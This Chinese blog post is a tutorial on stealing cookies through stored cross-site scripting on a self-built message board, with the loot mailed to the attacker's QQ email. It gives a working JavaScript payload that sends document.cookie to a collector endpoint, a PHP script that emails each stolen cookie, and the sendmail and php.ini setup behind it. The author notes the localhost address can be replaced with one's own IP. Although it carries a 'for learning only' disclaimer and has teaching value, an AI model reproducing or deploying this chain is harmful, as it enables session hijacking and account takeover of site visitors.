Xcnte

XSS获取cookie并发送自己邮箱
关于XSS获取cookie并发送到自己邮箱,这里我用自己做的简易留言板做个示范
扫描右侧二维码阅读全文
23
2018/12

XSS获取cookie并发送自己邮箱

关于XSS获取cookie并发送到自己邮箱,这里我用自己做的简易留言板做个示范

注意:本教程仅供学习交流



这是登录界面,输入用户名和密码登录后

可以对留言内容进行XSS尝试,没有作任何过滤,所以存在XSS的,这里不详细演示了,只看怎么获取cookie吧

<script>alert(document.cookie)</script>



这里可以看出cookie已经出来了,我们现在就是想别人登录时能够获取到别人的cookie

然后我自己写了个小脚本,用来获取别人的cookie

同样的方法插入xss代码,如果别人登录将会把别人的cookie发送到我邮箱里

因为是用php和js写的,所以我这里将php发送qq邮箱的方法说一下,毕竟这是困我好久的难题。

其实方法也不难,不过遇到各种各样的麻烦

需要配置sendmail,这是windows下的配置

首先,这里我用的是wamp和用php mail()函数发送的邮件,php mail()函数在windows不能用,需要安装sendmail,假如是用的XAMPP,则已经下载好,不需要重新下载

1.从http://glob.com.au/sendmail/下载sendmail.zip

2.解压到C(其他一样):下,例如C:\php\sendmail,最好短路径,长路径名有可能产生问题。

3.开启SMTP服务:因为这里我用的qq发送,所以要开启qq邮箱的SMTP服务。

所有的主流邮箱都支持 SMTP 协议,但并非所有邮箱都默认开启,您可以在邮箱的设置里面手动开启。

第三方服务在提供了账号和密码之后就可以登录 SMTP 服务器,通过它来控制邮件的中转方式。

(1)开启邮箱(进入qq邮箱点设置)

点击帐户,然后开启下图服务

(2)验证密保(开启可能要验证密保)
(3)生成授权码(授权码就是下面要用的东西,忘了图一会看到有生成授权码,没必要详记)


(4)配置sendmail文件

以下都是修改项
[sendmail] 
; you must change mail.mydomain.com to your smtp server 
smtp_server=smtp.qq.com 
smtp_port=465 //特别注意:端口这里是465,不是25,网上有很多填25,腾讯邮箱特别说明了为465
auth_username=QQ号码@qq.com
auth_password=授权码 //注意:这里是qq授权码不是邮箱密码
force_sender=QQ号码@qq.com

4.配置php.ini文件
打开wamp的php.ini然后搜索“[mail function]”,找到下面文本块,修改以下三样

[mail function] 
; For Win32 only. 
SMTP = smtp.qq.com //因为是qq邮箱
smtp_port = 25 
; For Win32 only. 
sendmail_from = qq号@qq.com 
; For Unix only. You may supply arguments as well (default: “sendmail -t -i”). 
sendmail_path = “E:\wamp64\sendmail\sendmail.exe -t”//修改成自己的路径

5.到这里就算配置完了,然后重启wamp

然后开始用自己的脚本试试了,php发送邮件的脚本很容易,然后再加上获取cookie的js脚本,就成了

<?php
$cookie = $_GET['joke'];
if(isset($_GET['joke']))
{
$to = "QQ@qq.com";         // 邮件接收者
$subject = "COOKIE";                // 邮件标题
$message = $_GET['joke'];  // 邮件正文
$from = "QQ@qq.com";   // 邮件发送者
$headers = "From:" . $from;         // 头部信息设置
mail($to,$subject,$message,$headers);
echo "邮件已发送";
}else
echo "邮件发送失败";
?>

var img = document.createElement('img');
img.width = 0;
img.height = 0;
img.src = 'http://localhost/project/1.php?joke='+encodeURIComponent(document.cookie);//这里是用本地环境测试的,可以换成自己的ip地址

然后就可以用了

<script src='http://localhost/project/joke.js'></script> //joke.js是我的js文件名


将这段代码留言就可以看到cookie了,任何人登录都可以收到他cookie


上面是本地测试,大家可以自己搭建一下环境,充当一下攻击者测试一下

Last modification:December 24th, 2018 at 02:51 pm
如果觉得我的文章对你有所帮助,请随意赞赏

Leave a Comment

One comment

  1. 江亚晴明

    涨姿势了(๑•̀ㅁ•́ฅ)